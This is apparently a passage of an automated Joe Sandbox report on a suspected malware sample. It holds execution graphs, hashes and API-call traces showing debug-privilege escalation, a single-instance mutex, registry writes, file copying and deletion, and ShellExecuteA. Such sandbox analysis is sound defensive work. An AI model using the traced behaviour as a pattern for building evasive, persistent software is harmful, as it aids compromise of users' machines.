42592d 19522->19524 19551 4252f5 19523->19551 19524->19517 19526 42592c 19526->19517 19528 425580 19527->19528 19529 425587 19527->19529 19530 4252f5 2 API calls 19528->19530 19529->19517 19531 425586 19530->19531 19531->19517 19533 4255be __dosmaperr __fassign 19532->19533 19537 4255a4 19532->19537 19533->19517 19534 42571e 19536 425740 19534->19536 19540 42572c 19534->19540 19575 425a06 19534->19575 19535 425757 19535->19536 19571 425b57 19535->19571 19536->19517 19537->19533 19537->19534 19537->19535 19537->19540 19540->19536 19579 425ed6 19540->19579 19543 42571e 19542->19543 19546 425704 19542->19546 19545 425740 19543->19545 19547 425a06 2 API calls 19543->19547 19550 42572c 19543->19550 19544 425757 19544->19545 19548 425b57 2 API calls 19544->19548 19545->19517 19546->19543 19546->19544 19546->19550 19547->19550 19548->19550 19549 425ed6 2 API calls 19549->19545 19550->19545 19550->19549 19552 425307 __dosmaperr 19551->19552 19555 427a71 19552->19555 19554 42532a __dosmaperr 19554->19526 19556 427a8c 19555->19556 19559 4273fb 19556->19559 19558 427a96 19558->19554 19560 42740d 19559->19560 19561 425108 __fassign 2 API calls 19560->19561 19564 427422 __dosmaperr __fassign 19560->19564 19563 427452 19561->19563 19563->19564 19565 427647 19563->19565 19564->19558 19566 427684 19565->19566 19567 427654 19565->19567 19568 42aee8 ___scrt_uninitialize_crt GetPEB GetPEB 19566->19568 19569 427663 __fassign 19567->19569 19570 42c12f GetPEB GetPEB 19567->19570 19568->19569 19569->19563 19570->19569 19573 425b72 19571->19573 19572 425ba7 19572->19540 19573->19572 19583 427bf7 19573->19583 19576 425a1f 19575->19576 19587 428fc1 19576->19587 19578 425ad4 19578->19540 19578->19578 19581 425f47 _ValidateLocalCookies 19579->19581 19582 425ef3 19579->19582 19580 427bf7 2 API calls 19580->19582 19581->19536 19582->19580 19582->19581 19584 427c07 19583->19584 19585 425108 __fassign 2 API calls 19584->19585 19586 427c0c ___scrt_uninitialize_crt __dosmaperr __fassign 19584->19586 19585->19586 19586->19572 19589 428fe7 19587->19589 19594 428fd1 __dosmaperr __fassign 19587->19594 19588 42908d 19591 4290b6 19588->19591 19592 4290f8 19588->19592 19589->19588 19590 429092 19589->19590 19589->19594 19600 428713 19590->19600 19595 4290da 19591->19595 19596 4290bb 19591->19596 19617 428a22 19592->19617 19594->19578 19613 428c12 19595->19613 19606 428d9b 19596->19606 19601 428725 19600->19601 19602 425108 __fassign 2 API calls 19601->19602 19603 428739 19602->19603 19604 428a22 2 API calls 19603->19604 19605 428741 __alldvrm __dosmaperr __fassign _strrchr 19603->19605 19604->19605 19605->19594 19607 428dc9 19606->19607 19608 428e0b 19607->19608 19609 428e44 19607->19609 19611 428e1d 19607->19611 19608->19594 19624 428aca 19609->19624 19621 428ca3 19611->19621 19614 428c3f 19613->19614 19615 428c84 19614->19615 19616 428ca3 2 API calls 19614->19616 19615->19594 19616->19615 19618 428a3a 19617->19618 19619 428aa5 19618->19619 19620 428aca 2 API calls 19618->19620 19619->19594 19620->19619 19622 425108 __fassign GetPEB GetPEB 19621->19622 19623 428cb9 __fassign 19622->19623 19623->19608 19625 428adb 19624->19625 19626 425108 __fassign GetPEB GetPEB 19625->19626 19627 428ae9 __dosmaperr __fassign 19625->19627 19628 428b0a ___scrt_uninitialize_crt __fassign 19626->19628 19627->19608

                                                                                                                Executed Functions

                                                                                                                Function 00421C40 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 125 421c40-421c58 call 4231d1 128 421c5a-421c73 call 4231d7 125->128 129 421c7c-421c82 125->129 132 421c83-421c8a 128->132 133 421c75-421c77 call 4d706d 128->133 135 421c90-421ca2 call 4271fa 132->135 133->129 138 421ca4-421cb3 call 4231dd 135->138 139 421cc5-421cd4 call 4d5b7a 135->139 138->135 144 421cb5-421cb7 call 48b328 138->144 146 421cbc-421cc4 144->146
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID: P]U
                                                                                                                • API String ID: 2538663250-2336967863
                                                                                                                • Opcode ID: 43de0fcac3a35f1e6787865db976a63f2db9bb5e38596c544f81196cb5d80e3e
                                                                                                                • Instruction ID: 399fe605e05182ab4977dabc91cd780db95a4767c235d0a9e5b4adce59d241f8
                                                                                                                • Opcode Fuzzy Hash: 43de0fcac3a35f1e6787865db976a63f2db9bb5e38596c544f81196cb5d80e3e
                                                                                                                • Instruction Fuzzy Hash: D601BE2170123C36DB2076B67C49EFFB69CDF06358F40019BFC08D3251E6689D1546E9
                                                                                                                Function 00423332 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • ___scrt_release_startup_lock.LIBCMT ref: 0042333A
                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0042334E
                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00423374
                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 004233B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
                                                                                                                • String ID: T7B$VPWh
                                                                                                                • API String ID: 3089971210-2601699101
                                                                                                                • Opcode ID: 0243d08ce549b15ef0027c87d88584c7aae207ae101b4b44588c0eba0b3d6897
                                                                                                                • Instruction ID: 530d31039de337bece1335ea06a066dd857e6e7da8ecb1207ca392e240c8f14c
                                                                                                                • Opcode Fuzzy Hash: 0243d08ce549b15ef0027c87d88584c7aae207ae101b4b44588c0eba0b3d6897
                                                                                                                • Instruction Fuzzy Hash: C901E9327047306ACA31BF7A780265EA7B19F8276ABA4005FF8802B281DE2D4F41C65C
                                                                                                                Function 00422040 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 355COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 35 422040-4220f1 36 4220f3-4220f7 35->36 37 422142-422301 call 4847aa call 481e90 RtlAdjustPrivilege 36->37 38 4220f9-422103 36->38 51 422303-422315 call 4f7a1a call 421c40 37->51 39 422105-422110 38->39 40 42213f 38->40 42 422112-42211d 39->42 43 42213a-42213d 39->43 40->37 45 422135-422138 42->45 46 42211f-422131 42->46 43->37 45->37 46->36 47 422133 46->47 47->37 55 42231a-422321 51->55 55->51 56 422323-42244a call 48e5b6 55->56 56->51 59 422450-422467 call 48d6bb call 4e530b 56->59 59->51 64 42246d-4224a0 call 48d996 59->64 67 4224a2-4224a6 64->67 68 4224b6-4224c8 call 47bf3c 64->68 67->68 69 4224a8-4224b1 call 421f10 67->69 74 4224f7-4224fe call 421ce0 68->74 75 4224ca-4224e7 call 4e02d7 call 4a1bfb 68->75 69->51 74->51 80 422504-42250d 74->80 75->74 85 4224e9-4224f2 call 421f10 75->85 82 422510-422560 80->82 82->82 84 422562-422567 82->84 86 422569 84->86 87 42257e-42259e call 423080 84->87 85->51 90 422570-42257c 86->90 93 4225a0-4225fc 87->93 90->87 90->90 93->93 94 4225fe-422603 93->94 94->51 95 422609 94->95 96 422610-42261c 95->96 96->96 97 42261e 96->97 97->51
                                                                                                                APIs
                                                                                                                • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?,00000000), ref: 00422301
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustPrivilege
                                                                                                                • String ID: >n[
                                                                                                                • API String ID: 3260937286-2858838698
                                                                                                                • Opcode ID: 4db8cc55700e274585cd7cef989a61d2ec908114e4f126661dc4d532bd8efff8
                                                                                                                • Instruction ID: 39c43bfc3d6c3962c4d77cb623078b6444c2b646aabfe2c7320cf86ac284f76b
                                                                                                                • Opcode Fuzzy Hash: 4db8cc55700e274585cd7cef989a61d2ec908114e4f126661dc4d532bd8efff8
                                                                                                                • Instruction Fuzzy Hash: B90249B4D04358EADB15CFA8DA81BEDBBB0BF59304F14929AD848BB351E7341A81DF04

                                                                                                                Non-executed Functions

                                                                                                                Function 004FD450 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: C
                                                                                                                • API String ID: 0-1037565863
                                                                                                                • Opcode ID: df1c6e62853feafcb348d590a78cf957361b35190de3b2fc678e05946afce8e3
                                                                                                                • Instruction ID: 5dbe7984de8f85c7d75440a92c1a164676ac9c054dfb81494d66e1e6fa126512
                                                                                                                • Opcode Fuzzy Hash: df1c6e62853feafcb348d590a78cf957361b35190de3b2fc678e05946afce8e3
                                                                                                                • Instruction Fuzzy Hash: DE318F354187088B8718FF36F88549BB3A6FBE5310F108A3ED586C7556EF355116CB85
                                                                                                                Function 004269BF Relevance: .0, Instructions: 23COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a797275b9167bd967ee11d8a7932701e26c196e00fb3a382749bb5ba7c5bd4b1
                                                                                                                • Instruction ID: b1cc327c6954047dbf85218dcd38c42e47bd77acc5204ec104efcb4cf49ddb7f
                                                                                                                • Opcode Fuzzy Hash: a797275b9167bd967ee11d8a7932701e26c196e00fb3a382749bb5ba7c5bd4b1
                                                                                                                • Instruction Fuzzy Hash: F0E04F311000586ECA217B16D942F5E3B5DDB00344B41041BFC0496222DE3DEDA1C698
                                                                                                                Function 0042A98F Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 49f279cfa371842c5a2d01b04651cc193959fb2ce08c41a892b596f6d33810b7
                                                                                                                • Instruction ID: ec66797fcc3d274d813dc75ab908e2657eae626c69cdf0abaace52d5f0ddf855
                                                                                                                • Opcode Fuzzy Hash: 49f279cfa371842c5a2d01b04651cc193959fb2ce08c41a892b596f6d33810b7
                                                                                                                • Instruction Fuzzy Hash: 8AE08C72A11238EBCB15DBCAD944A8AF3ECEB48B04F52499BF901D3200C274DE40CBD4
                                                                                                                Function 00423F00 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 153 423f00-423f51 call 433200 call 423eb0 call 424317 160 423f53-423f65 153->160 161 423fad-423fb0 153->161 163 423fd0-423fd9 160->163 164 423f67-423f7e 160->164 162 423fb2-423fbf call 424300 161->162 161->163 169 423fc4-423fcd call 423eb0 162->169 166 423f80-423f8e call 4242a0 164->166 167 423f94 164->167 176 423f90 166->176 177 423fa4-423fab 166->177 168 423f97-423f9c 167->168 168->164 171 423f9e-423fa0 168->171 169->163 171->163 174 423fa2 171->174 174->169 178 423f92 176->178 179 423fda-423fe3 176->179 177->169 178->168 180 423fe5-423fec 179->180 181 42401d-42402d call 4242e0 179->181 180->181 183 423fee-423ffd call 432cd0 180->183 187 424041-42405d call 423eb0 call 4242c0 181->187 188 42402f-42403e call 424300 181->188 189 42401a 183->189 190 423fff-424017 183->190 188->187 189->181 190->189
                                                                                                                APIs
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00423F37
                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00423F3F
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00423FC8
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00423FF3
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00424048
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                • String ID: T7B$csm
                                                                                                                • API String ID: 1170836740-3288471982
                                                                                                                • Opcode ID: a52e7448aec00f5020e9b5dc413c935901b809413263888687d76c2e1c3f2a1a
                                                                                                                • Instruction ID: a8723639d77812d8c613c4e8fbf9e77faf9828eff13bbde4980f9ed1e010d627
                                                                                                                • Opcode Fuzzy Hash: a52e7448aec00f5020e9b5dc413c935901b809413263888687d76c2e1c3f2a1a
                                                                                                                • Instruction Fuzzy Hash: 2541E530F002299BCF00DF69E844A9EBBB5FF44318F55815AE8149B392D73DAA45CB99
                                                                                                                Function 00428713 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 655 428713-428723 656 428727-42873f call 425108 655->656 657 428725 655->657 660 428741-428750 call 4279bb call 4278fe 656->660 661 428755-42876c 656->661 657->656 681 428a0b-428a11 660->681 663 4287c1-4287c5 661->663 664 42876e-428790 call 428a22 661->664 667 4287c7 663->667 668 4287d4-428802 663->668 679 428792-428795 664->679 680 42879a-4287a6 call 4330c0 664->680 669 4287c9-4287cb 667->669 670 4287cd-4287d1 667->670 672 428822 668->672 673 428804-428812 668->673 669->668 669->670 670->668 678 428825 672->678 676 428814-428817 673->676 677 428819-428820 673->677 682 428827-42882f 676->682 677->678 678->682 679->681 690 4287ba-4287bc 680->690 691 4287a8-4287b6 680->691 684 428a13-428a16 681->684 685 428a1d-428a21 681->685 686 428831-428833 682->686 687 428835-428840 682->687 684->685 689 428842-42884f 686->689 687->689 692 428851-428853 689->692 693 428859-428869 689->693 690->681 691->690 692->693 694 428910-428912 692->694 695 42886c-42886e 693->695 696 428927-42892d 694->696 697 428914-428924 call 423d50 694->697 698 4288c0-4288c6 695->698 699 428870-428896 call 432fb0 695->699 703 428934-428962 call 432fb0 696->703 704 42892f-428931 696->704 697->696 698->694 702 4288c8-4288d9 call 428f2e 698->702 709 42889b-4288be 699->709 710 428898 699->710 702->694 713 4288db-4288e0 702->713 714 428964 703->714 715 42896e-428977 703->715 704->703 709->695 709->698 710->709 716 4288e1-4288e6 713->716 717 428966-428968 714->717 718 42896a-42896c 714->718 719 428978-428986 715->719 722 4288e8-4288eb 716->722 723 4288ed-4288f0 716->723 717->715 717->718 718->719 720 4289b0-4289b2 719->720 721 428988-42898d 719->721 726 4289b4-4289b6 720->726 727 4289bf-4289d9 call 432e70 720->727 724 428993-4289ae call 432e70 721->724 725 42898f-428991 721->725 722->723 728 4288f2-4288f8 722->728 723->716 724->720 725->720 725->724 730 4289db-4289dd 726->730 731 4289b8 726->731 727->730 733 4288fa-4288fd 728->733 734 42890d 728->734 738 4289ea-4289ff call 432e70 730->738 739 4289df-4289e1 730->739 731->727 736 4289ba-4289bd 731->736 740 428907 733->740 741 4288ff-428905 733->741 734->694 736->727 736->730 745 428a01-428a09 738->745 744 4289e3 739->744 739->745 742 428909-42890b 740->742 741->742 742->694 744->738 747 4289e5-4289e8 744->747 745->681 747->738 747->745
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000030.00000002.3347729487.0000000000421000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00420000, based on PE: true
                                                                                                                • Associated: 00000030.00000002.3347685742.0000000000420000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347770061.0000000000434000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347793238.000000000043C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3347833027.0000000000472000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348062669.0000000000504000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                • Associated: 00000030.00000002.3348281438.0000000000688000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_48_2_420000_53jGFr5v.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3213747228-0
                                                                                                                • Opcode ID: fddec55730cdf065d5760ea2cbc89b63d833d6c23407308736359d42c54f7ee8
                                                                                                                • Instruction ID: 66bcad20d549ed7498c692cff78688b878eb08f81f458f55c0d3bbcc2620ecb6
                                                                                                                • Opcode Fuzzy Hash: fddec55730cdf065d5760ea2cbc89b63d833d6c23407308736359d42c54f7ee8
                                                                                                                • Instruction Fuzzy Hash: C4B15671A022A59FDB118F28D8417BFBBE5EF55340FA4406FE840AB341DA398D42CB69

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:5.3%
                                                                                                                Dynamic/Decrypted Code Coverage:16.7%
                                                                                                                Signature Coverage:0.8%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:86
                                                                                                                execution_graph 119715 100066e0 GetCurrentProcess OpenProcessToken 119716 10006722 GetTokenInformation 119715->119716 119717 100068f9 119715->119717 119716->119717 119719 1000673f 119716->119719 119742 10008d24 119717->119742 119719->119717 119721 1000674f CreateMutexA 119719->119721 119720 10006906 119722 100068c2 ExitProcess 119721->119722 119723 100068c9 GetLastError 119721->119723 119724 100068e5 119723->119724 119725 100068d6 CloseHandle ExitProcess 119723->119725 119728 10002ae0 119724->119728 119727 100068ea CloseHandle ExitProcess 119749 10002e60 RegCreateKeyExA 119728->119749 119730 10002ae9 119731 10002af1 CreateThread 119730->119731 119732 10002aed 119730->119732 119733 10002b20 CreateThread 119731->119733 119734 10002b1d 119731->119734 120251 10006170 GetModuleFileNameA 119731->120251 119732->119727 119735 10002b37 119733->119735 119736 10002b3a CreateThread 119733->119736 120241 10005290 119733->120241 119734->119733 119735->119736 119737 10002b51 119736->119737 120220 10005560 RegCreateKeyExA 119736->120220 119758 100034f0 119737->119758 119739 10002b59 CreateThread 119740 10002b72 WaitForSingleObject 119739->119740 119741 10002b7e 119739->119741 120209 10001060 119739->120209 119740->119741 119741->119727 119743 10008d2c 119742->119743 119744 10008d2d IsProcessorFeaturePresent 119742->119744 119743->119720 119746 100091a9 119744->119746 120312 1000916c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 119746->120312 119748 1000928c 119748->119720 119750 100032c6 RegSetValueExA 119749->119750 119751 1000330c 119749->119751 119752 10003306 RegCloseKey 119750->119752 119753 100032ea RegCloseKey 119750->119753 119754 10008d24 CatchGuardHandler 5 API calls 119751->119754 119752->119751 119755 10008d24 CatchGuardHandler 5 API calls 119753->119755 119756 10003318 119754->119756 119757 100032ff 119755->119757 119756->119730 119757->119730 119818 10004be0 119758->119818 119760 10003c50 119830 10002bb0 119760->119830 119764 10003c2d GetFileAttributesA 119766 10003c52 119764->119766 119767 10003c13 119764->119767 119827 1000bee1 119766->119827 119767->119760 119767->119764 119770 1000bee1 ___std_type_info_destroy_list 14 API calls 119767->119770 119821 100045f0 119767->119821 119768 10003cb8 119789 1000411d 119768->119789 119862 10001030 119768->119862 119770->119767 119772 10008d24 CatchGuardHandler 5 API calls 119776 10004160 119772->119776 119774 10003ca4 CloseHandle 119774->119760 119775 10003c86 CloseHandle 119778 10008d24 CatchGuardHandler 5 API calls 119775->119778 119776->119739 119781 10003c9d 119778->119781 119779 10004be0 GetSystemTimeAsFileTime 119780 10003e80 119779->119780 119782 100045f0 32 API calls 119780->119782 119781->119739 119783 10003e86 119782->119783 119783->119789 119866 1000be8d 119783->119866 119785 10003e96 _strrchr 119786 10004149 119785->119786 119788 10003ebc GetFileAttributesA 119785->119788 119787 1000bee1 ___std_type_info_destroy_list 14 API calls 119786->119787 119787->119789 119790 10003ec8 CreateDirectoryA 119788->119790 119791 10003ed9 119788->119791 119789->119772 119790->119791 119792 10004111 119790->119792 119874 10001d70 119791->119874 119794 1000bee1 ___std_type_info_destroy_list 14 API calls 119792->119794 119796 10004117 119794->119796 119798 1000bee1 ___std_type_info_destroy_list 14 API calls 119796->119798 119798->119789 119799 10004103 DeleteFileA RemoveDirectoryA 119799->119792 119802 10004c80 2 API calls 119804 100040d3 119802->119804 119803 10003efd _strrchr 119803->119799 119908 10004c80 GetFileAttributesA 119803->119908 119911 100051c0 119804->119911 119919 10004b50 GetSystemTimeAsFileTime 119818->119919 119820 10004bee 119820->119767 119822 100048ec 119821->119822 119826 10004abc 119822->119826 119920 10006920 32 API calls 119822->119920 119823 10008d24 CatchGuardHandler 5 API calls 119824 10004acd 119823->119824 119824->119767 119826->119823 119921 1001017e 119827->119921 119829 10003c57 Sleep CreateMutexA GetLastError 119829->119774 119829->119775 119831 10004be0 GetSystemTimeAsFileTime 119830->119831 119839 10002bc9 _strrchr 119831->119839 119832 10002e46 119833 10008d24 CatchGuardHandler 5 API calls 119832->119833 119834 10002e53 119833->119834 119848 10004e80 119834->119848 119835 100045f0 32 API calls 119835->119839 119836 1000be8d 25 API calls 119836->119839 119837 10002c22 GetFileAttributesA 119837->119839 119838 1000bee1 14 API calls ___std_type_info_destroy_list 119838->119839 119839->119832 119839->119835 119839->119836 119839->119837 119839->119838 119843 10002d83 119839->119843 119928 10005230 65 API calls 119839->119928 119844 10002de7 DeleteFileA 119843->119844 119845 10002ddc SetFileAttributesA 119843->119845 119846 10002e07 RemoveDirectoryA 119843->119846 119847 10002dfc SetFileAttributesA 119843->119847 119929 10005230 65 API calls 119843->119929 119930 10006010 13 API calls CatchGuardHandler 119843->119930 119844->119843 119845->119844 119846->119839 119847->119846 119849 10004ebc RegCreateKeyExA 119848->119849 119850 1000519f 119848->119850 119849->119850 119852 10004fb2 ___std_exception_copy 119849->119852 119851 10008d24 CatchGuardHandler 5 API calls 119850->119851 119853 100051ac 119851->119853 119854 10004fc4 RegGetValueA 119852->119854 119853->119768 119855 10005193 RegCloseKey 119854->119855 119856 100050bf 119854->119856 119855->119850 119856->119855 119858 100050d6 119856->119858 119858->119858 119931 1000be33 119858->119931 119860 10008d24 CatchGuardHandler 5 API calls 119861 1000518a 119860->119861 119861->119768 119863 10001049 119862->119863 119943 1000e3d4 119863->119943 119867 1000beca 119866->119867 119868 1000be9a 119866->119868 119867->119785 119868->119867 119869 1000be33 ___std_exception_copy 25 API calls 119868->119869 119870 1000bec3 119869->119870 119870->119867 119871 1000bed4 119870->119871 119968 1000e653 11 API calls ___std_exception_copy 119871->119968 119873 1000bee0 119969 10002990 119874->119969 119876 10001db6 119877 100028d5 119876->119877 119878 10001dbe 119876->119878 119881 10008d24 CatchGuardHandler 5 API calls 119877->119881 119980 10006920 32 API calls 119878->119980 119880 100027e6 ShellExecuteA 119880->119877 119882 100028e3 119881->119882 119883 10004170 